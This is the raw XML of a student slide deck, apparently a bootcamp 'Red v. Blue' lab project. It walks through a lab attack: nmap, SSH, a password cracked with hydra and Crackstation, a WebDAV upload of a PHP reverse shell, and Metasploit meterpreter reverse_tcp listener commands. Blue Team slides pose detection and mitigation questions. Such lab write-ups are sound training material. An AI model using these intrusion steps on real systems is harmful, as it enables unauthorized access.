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Roboto" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId30"/>
      <p:bold r:id="rId31"/>
      <p:italic r:id="rId32"/>
      <p:boldItalic r:id="rId33"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId34"/>
      <p:bold r:id="rId35"/>
      <p:italic r:id="rId36"/>
      <p:boldItalic r:id="rId37"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId38"/>
      <p:bold r:id="rId39"/>
      <p:italic r:id="rId40"/>
      <p:boldItalic r:id="rId41"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Slab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8a843892d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8a843892d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8a843892d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8a843892d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8a843892d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8a843892d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8a843892d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8a843892d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8a843892d_0_2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8a843892d_0_2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8a843892d_0_9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8a843892d_0_9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8a843892d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8a843892d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8a843892d_0_1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8a843892d_0_1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8a843892d_0_2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8a843892d_0_2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8a843892d_0_3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8a843892d_0_3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8a843892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8a843892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8a843892d_0_4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8a843892d_0_4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8a843892d_0_4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8a843892d_0_4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8a843892d_0_5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8a843892d_0_5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8a843892d_0_6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8a843892d_0_6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8a843892d_0_7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8a843892d_0_7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8a843892d_0_8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8a843892d_0_8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8a843892d_0_9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8a843892d_0_9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8a843892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8a843892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8a843892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8a843892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8a843892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8a843892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8a843892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8a843892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8a843892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8a843892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8a843892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8a843892d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8a843892d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8a843892d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8a843892d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8a843892d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Text Only">
  <p:cSld name="CUSTOM_2_7_2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2" name="Google Shape;62;p13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13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3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175" y="1284250"/>
            <a:ext cx="9144000" cy="3581700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="91440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. Numbered 1–2 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_5_2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86275" y="649650"/>
            <a:ext cx="827450" cy="411523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2" name="Google Shape;72;p14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-12300" y="1602450"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm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4936274" y="890150"/>
            <a:ext cx="2688300" cy="476700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="365C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System Hardening</a:t>
            </a:r>
            <a:endParaRPr sz="21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6" name="Google Shape;76;p14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5072469" y="1278938"/>
            <a:ext cx="261029" cy="144694"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtract">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="365C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457246" y="887925"/>
            <a:ext cx="2688300" cy="4767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Alarm</a:t>
            </a:r>
            <a:endParaRPr sz="21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8" name="Google Shape;78;p14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="575363" y="1276701"/>
            <a:ext cx="226486" cy="144694"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtra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3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613700" y="1267175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v. Blue Project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1646652" y="3116775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Zachary Saunders, Harrison Hayes, Heidi Robinson, Seth Zajac, Collin Fowler, Rashad Hair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Finishing Touches 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259950" y="1382150"/>
            <a:ext cx="8368200" cy="30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we finally connected to WebDav we could finally upload the PHP reverse shell payload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highlighted payload text that was given and made a Text Editor file and named it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="D0E0E3"/>
                </a:highlight>
              </a:rPr>
              <a:t>payload2.php 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975" y="2120700"/>
            <a:ext cx="6143025" cy="19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54250" y="52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 the Plan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payload that you uploaded to the site to open up a meterpreter session.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we connected the WebDav and then save the payload, we then exploited the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Commands used: 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msf5&gt; set payload/meterpreter/reverse_tcp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msf5&gt; set LHOST 192.168.1.105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msf5&gt; set LPORT 4444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msf5&gt; exploit -j -Z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929" y="2367550"/>
            <a:ext cx="2817899" cy="256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Once we Executed the payload we then went back to connect WebDav and did a cadaver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Once again we connected to WebDav and then clicked the Kali Linux “dragon tab” to execute the Cadaver. </a:t>
            </a:r>
            <a:endParaRPr sz="1500"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000" y="2697475"/>
            <a:ext cx="5749300" cy="233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50" y="2679863"/>
            <a:ext cx="3127125" cy="2366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the Flag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there we finally connected into Ryan’s account and found the hidden directory that had the flag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C9DAF8"/>
                </a:highlight>
              </a:rPr>
              <a:t>Pic of the hidden directory </a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="C9DAF8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Flag.txt: b1ng0w@5h1sn@m0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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1680302" y="1370700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 TEAM</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Google Shape;171;p28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Log Analysis and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3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3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Attack Characterization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FFF2CC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We added Kibana into the Log data and were able to import the filebeat, metricbeat, and packetbeat data</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1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100"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1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Which opened four tabs</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1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We then Added the Apache logs:</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1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100"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1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By going to “add Log Data”</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1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100"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1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Then clicking Apache logs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000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" b="1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Adding System Logs</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1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Click on Add Log Data</a:t>
            </a:r>
            <a:endParaRPr sz="11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Click on System logs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Adding Apache Metrics</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1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Click on Add Metric Data</a:t>
            </a:r>
            <a:endParaRPr sz="11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Click on Apache Metrics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Adding System Metrics</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1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Click on Add Metric Data</a:t>
            </a:r>
            <a:endParaRPr sz="11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Click on System Metrics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Analysis: Identifying the Port Scan</a:t>
            </a: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4114800" cy="12696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Answer the following questions in bullet points under the screenshot if space allows. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Otherwise, add the answers to speaker notes. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/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endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Google Shape;184;p30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subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3869450" y="635575"/>
            <a:ext cx="4911000" cy="9717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time did the port scan occur?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l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many packets were sent, and from which IP?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>What indicates that this was a port scan?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"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00" y="835137"/>
            <a:ext cx="424701" cy="3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1300" y="1562050"/>
            <a:ext cx="5333474" cy="33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Analysis: Finding the Request for the Hidden Directory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p31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4114800" cy="12696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Answer the following questions in bullet points under the screenshot if space allows. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Otherwise, add the answers to speaker notes. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/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endParaRPr sz="1200"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5" name="Google Shape;195;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1467800"/>
            <a:ext cx="8409300" cy="2384100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6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Unable to successfully locate data in kibana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Include a screenshot of Kibana logs depicting the request for the hidden directory.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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3663050" y="741300"/>
            <a:ext cx="5791200" cy="971700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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time did the request occur? How many requests were made?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Which files were requested? What did they contain?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"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00" y="835137"/>
            <a:ext cx="424701" cy="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Analysis: Uncovering the Brute Force Attack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4114800" cy="12696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Answer the following questions in bullet points under the screenshot if space allows. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Otherwise, add the answers to speaker notes. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/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endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Google Shape;204;p32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367350" y="1467800"/>
            <a:ext cx="8409300" cy="2384100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6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Unable to successfully locate data in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kibana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Include a screenshot of Kibana logs depicting the request for the hidden directory.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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3663050" y="741300"/>
            <a:ext cx="5791200" cy="971700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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many requests were made in the attack?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>How many requests had been made before the attacker </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>discovered the password?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"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00" y="835137"/>
            <a:ext cx="424701" cy="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Analysis: Finding the WebDAV Connection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33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4114800" cy="12696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Answer the following questions in bullet points under the screenshot if space allows. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Otherwise, add the answers to speaker notes. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/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endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Google Shape;214;p33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367350" y="1467800"/>
            <a:ext cx="8409300" cy="2384100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6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Unable to successfully locate data in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kibana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Include a screenshot of Kibana logs depicting the request for the hidden directory.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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3663050" y="741300"/>
            <a:ext cx="5791200" cy="971700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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many requests were made to this directory?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Which files were requested?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"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00" y="835137"/>
            <a:ext cx="424701" cy="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Team (Day 1)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87900" y="141577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Overall, going into Day 1 we were very intimidated by this part of the project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was going to be one of the few times that we were not gonna have our MVP Legend TA Nathaniel Skaggs not helping us at all with this project.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knew that we had to work together as one in order to get the first part of the project.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would counterpart our strengths and weakness from previous units and come together to finish the project!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draw.io???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TEAM</a:t>
            </a:r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Proposed Alarms and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3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3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Mitigation Strategies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Blocking the Port Scan</a:t>
            </a:r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subTitle" idx="1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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="3051300"/>
          </a:xfrm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kind of alarm can be set to detect future port scans?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What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="Google Shape;231;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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configurations can be set on the host to mitigate port scans?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Describe the solution. If possible, provide required command lines.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Finding the Request for the Hidden Directory</a:t>
            </a:r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1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38" name="Google Shape;238;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm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kind of alarm can be set to detect future unauthorized access?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What threshold would you set to activate this alarm?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239" name="Google Shape;239;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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configuration can be set on the host to block unwanted access?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Describe the solution. If possible, provide required command lines.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Preventing Brute Force Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="Google Shape;245;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1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46" name="Google Shape;246;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm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kind of alarm can be set to detect future brute force attacks?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What threshold would you set to activate this alarm?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247" name="Google Shape;247;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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configuration can be set on the host to block brute force attacks?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Describe the solution. If possible, provide the required command line(s).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Detecting the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="Google Shape;253;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1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54" name="Google Shape;254;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm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kind of alarm can be set to detect future access to this directory?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What threshold would you set to activate this alarm?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255" name="Google Shape;255;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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configuration can be set on the host to control access?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Describe the solution. If possible, provide the required command line(s).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Identifying Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="Google Shape;261;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm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kind of alarm can be set to detect future file uploads?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What threshold would you set to activate this alarm?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263" name="Google Shape;263;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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configuration can be set on the host to block file uploads?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Describe the solution. If possible, provide the required command line.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0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vs Blue - Day 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="Google Shape;276;p4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7" name="Google Shape;2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00" y="2011825"/>
            <a:ext cx="82296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Setup (Day 1)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273450" y="15773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Started with downloading the Microsoft Azure “Red vs Blue” VM environment via the azadmin login credentials.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Opened the Hyper-V Terminal to access Capstone and Kali VM machines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Switched to the root user to download the modules noted in the next slide for use on Day 2 of Project 2.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Command: sudo su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3825" y="5455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Setup (Day 1)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40775" y="15100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 dirty="0"/>
              <a:t>We had to set up three modules on the Capstone VM (Filebeat, Metricbeat, and Packet)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To help us setup up all three we used these Commands: </a:t>
            </a:r>
            <a:endParaRPr sz="1200"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 dirty="0"/>
              <a:t>Filebeat:</a:t>
            </a:r>
            <a:endParaRPr sz="1200"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filebeat modules enable apache</a:t>
            </a:r>
            <a:endParaRPr sz="1200"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filebeat setup</a:t>
            </a:r>
            <a:endParaRPr sz="1200"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 dirty="0"/>
              <a:t>Metricbeat:</a:t>
            </a:r>
            <a:endParaRPr sz="1200"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Metricbeat modules enable apache</a:t>
            </a:r>
            <a:endParaRPr sz="1200"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Metricbeat setup</a:t>
            </a:r>
            <a:endParaRPr sz="1200"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 dirty="0"/>
              <a:t> Packet:</a:t>
            </a:r>
            <a:endParaRPr sz="1200"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Packet setup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Once the above modules were installed, we then had to restart the service for each of them as follows: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Systemctl restart filebeat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Systemctl restart metricbeat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Systemctl restart packetbeat </a:t>
            </a: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87900" y="3772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Commence the Attack! - Day 1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 to commence the Attack!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First Step - Discover IP address of the Linux web server. This was accomplished by doing a “ifconfig” command on the Capstone VM to get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>IP 192.168.1.105</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>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Next Step - nmap command from the Kali VM to get open port information on the Capstone VM</a:t>
            </a:r>
            <a:endParaRPr sz="16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275" y="2683938"/>
            <a:ext cx="59436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 problems but a hidden directory ain't one (Day 1) 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455225" y="15504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Confirmed the SSH port 22 was open and connected using the following:</a:t>
            </a:r>
            <a:endParaRPr sz="12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 dirty="0"/>
              <a:t>ssh vagrant@192.168.1.105 and then entered PW for vagrant.</a:t>
            </a:r>
            <a:endParaRPr sz="12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 dirty="0"/>
              <a:t>Changed to Root by using the sudo su command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Started our search for the hidden directory, but the real question was which one was the right one?  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>nd down the Rabbit Hole we went….</a:t>
            </a:r>
            <a:endParaRPr sz="12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200" dirty="0"/>
              <a:t>Cd /var/www/html/company_folders</a:t>
            </a:r>
            <a:endParaRPr sz="12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200" dirty="0"/>
              <a:t>Ls -al to discover the secret_folder</a:t>
            </a:r>
            <a:endParaRPr sz="12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200" dirty="0"/>
              <a:t>Cd secret_folder and then ls -al command to see contents of directory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We actually found the flag.txt while delving into each hidden directory before getting to the additional work!</a:t>
            </a:r>
            <a:endParaRPr sz="12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200" dirty="0"/>
              <a:t>*cough* b1ngow@5h!sn@m0 *cough*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The next 2 hours we spent trying to find the proper hidden directory to help us advance to the next step</a:t>
            </a:r>
            <a:endParaRPr sz="12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200" dirty="0"/>
              <a:t>It was almost like we were overthinking it just a tad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Anyways, after Day 1 we left the class extremely discouraged and lost because we had no idea where to go, so we knew that for Day 2 we had to study a lot more to conquer the Red team tasks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>!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on Red Team! (Day 2)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Going into Day 2, while everyone was moving on to the Blue team part of the project. Our group had yet to finish the Red Team part of the project!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in Day 2 it seemed that we all were working as a team and ready to succeed.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we were trying to find a hidden directory for two hours the last time.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Luckily the command line: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root@server1:var/www/comapny_folders/secert_folder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showed us that in this folder that we needed to go into Ryan’s account, and brute force his password for the hidden directory using the hydra command.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Seeing the Light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3825" y="1314799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used Crackstation to help crack Ryans passcode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passcode for Ryan: linux4u </a:t>
            </a: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then were able to brute force the passcode for the hidden directory using the hydra command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Once the hydra command finally went through, we were relieved, but far from over!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then had to connect into the WebDav!</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight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highlight>
                <a:srgbClr val="D9EAD3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highlight>
                <a:srgbClr val="D9EAD3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325" y="3008725"/>
            <a:ext cx="6848226" cy="20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hydra command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Connecting to WebDav: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750" y="1903298"/>
            <a:ext cx="6727126" cy="14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9950" y="3440850"/>
            <a:ext cx="2202149" cy="16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1582</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>213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Roboto</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto Slab</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Marina</vt:lpstr>
      <vt:lpstr>Red v. Blue Project</vt:lpstr>
      <vt:lpstr>Red Team (Day 1)</vt:lpstr>
      <vt:lpstr>Introduction and Setup (Day 1)</vt:lpstr>
      <vt:lpstr>Introduction and Setup (Day 1)</vt:lpstr>
      <vt:lpstr>Commence the Attack! - Day 1</vt:lpstr>
      <vt:lpstr>99 problems but a hidden directory ain't one (Day 1) </vt:lpstr>
      <vt:lpstr>Still on Red Team! (Day 2)</vt:lpstr>
      <vt:lpstr>Seeing the Light</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Finishing Touches </vt:lpstr>
      <vt:lpstr>Executing the Plan</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Found the Flag</vt:lpstr>
      <vt:lpstr>BLUE TEAM</vt:lpstr>
      <vt:lpstr>Setting up</vt:lpstr>
      <vt:lpstr>Analysis: Identifying the Port Scan</vt:lpstr>
      <vt:lpstr>Analysis: Finding the Request for the Hidden Directory</vt:lpstr>
      <vt:lpstr>Analysis: Uncovering the Brute Force Attack</vt:lpstr>
      <vt:lpstr>Analysis: Finding the WebDAV Connection</vt:lpstr>
      <vt:lpstr>BLUE TEAM</vt:lpstr>
      <vt:lpstr>Mitigation: Blocking the Port Scan</vt:lpstr>
      <vt:lpstr>Mitigation: Finding the Request for the Hidden Directory</vt:lpstr>
      <vt:lpstr>Mitigation: Preventing Brute Force Attacks</vt:lpstr>
      <vt:lpstr>Mitigation: Detecting the WebDAV Connection</vt:lpstr>
      <vt:lpstr>Mitigation: Identifying Reverse Shell Uploads</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Red vs Blue - Day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v. Blue Project</dc:title>
  <dc:creator>HRobinson</dc:creator>
  <cp:lastModifiedBy>Heidi Robinson</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-11T23:45:37Z</dcterms:modified>
</cp:coreProperties>
</file>